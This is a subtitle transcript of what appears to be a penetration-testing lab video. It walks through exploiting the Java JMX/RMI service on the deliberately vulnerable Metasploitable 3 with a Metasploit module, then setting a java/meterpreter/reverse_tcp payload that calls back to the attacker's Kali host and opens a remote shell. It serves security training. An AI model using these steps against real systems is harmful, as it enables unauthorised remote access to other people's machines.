1
00:00:00,300 --> 00:00:01,800
So let me clear my screen.

2
00:00:04,630 --> 00:00:06,540
List the services again.

3
00:00:08,950 --> 00:00:13,570
And we exploited the SMB service on Metasploitable 3.

4
00:00:15,420 --> 00:00:20,250
So now I need the next candidate to exploit.

5
00:00:21,460 --> 00:00:26,740
So let's go a little bit further, shall we, with this RMI registry.

6
00:00:27,790 --> 00:00:38,710
Now, you can follow different strategies; for example, you can search for the service name and description.

7
00:00:39,670 --> 00:00:44,530
You can also look for vulnerabilities on the Internet or in Metasploit's search results.

8
00:00:45,530 --> 00:00:46,760
It's entirely up to you.

9
00:00:48,120 --> 00:00:54,320
This time around, I'm going to search for "RMI" as a phrase on the Java platform.

10
00:00:57,480 --> 00:01:01,140
So here are the modules related to Java RMI.

11
00:01:02,210 --> 00:01:07,700
Now, I'm not going to use these blindly, so I need to find a suitable one.

12
00:01:08,990 --> 00:01:16,340
And you can read all the descriptions if you want, and you can also do an Internet search.

13
00:01:17,500 --> 00:01:24,190
Now, the other ones aren't really related, so I'm going to choose the Java JMX server exploit

14
00:01:24,190 --> 00:01:24,580
module.

15
00:01:26,640 --> 00:01:31,050
And this time I will directly set RHOST.

16
00:01:33,380 --> 00:01:36,710
And I'm going to set RPORT also.

17
00:01:38,060 --> 00:01:39,290
And check.

18
00:01:40,840 --> 00:01:43,930
So, yes, indeed, the target seems to be vulnerable.

19
00:01:45,070 --> 00:01:51,070
So, yeah, you know, I'm reading your mind here: you've got a new command, the check command.

20
00:01:52,210 --> 00:01:56,290
If the module allows you to do this test, go ahead and use it.

21
00:01:57,340 --> 00:02:00,450
OK, so now let's show the options.

22
00:02:02,650 --> 00:02:10,420
So what's missing here? The payload, right? So before setting the payload, let's have a look at

23
00:02:10,420 --> 00:02:11,200
the suitable ones.

24
00:02:13,010 --> 00:02:14,110
The reverse Java

25
00:02:14,150 --> 00:02:15,740
Meterpreter payload will

26
00:02:16,630 --> 00:02:18,730
fit perfectly for this exploit.

27
00:02:20,380 --> 00:02:27,210
Set the payload to java/meterpreter/reverse_tcp.

28
00:02:28,510 --> 00:02:31,690
And then set LHOST to your Kali's IP address.

29
00:02:33,420 --> 00:02:42,330
And set LPORT to any available port, so I'll set mine to 4447.

30
00:02:44,230 --> 00:02:45,550
Show the options again.

31
00:02:47,240 --> 00:02:48,470
Nothing to change here.

32
00:02:49,390 --> 00:02:50,980
So let's run the exploit.

33
00:02:56,070 --> 00:02:57,570
All right, so the session is open.

34
00:02:58,750 --> 00:03:02,770
And you are in the machine as a restricted service user.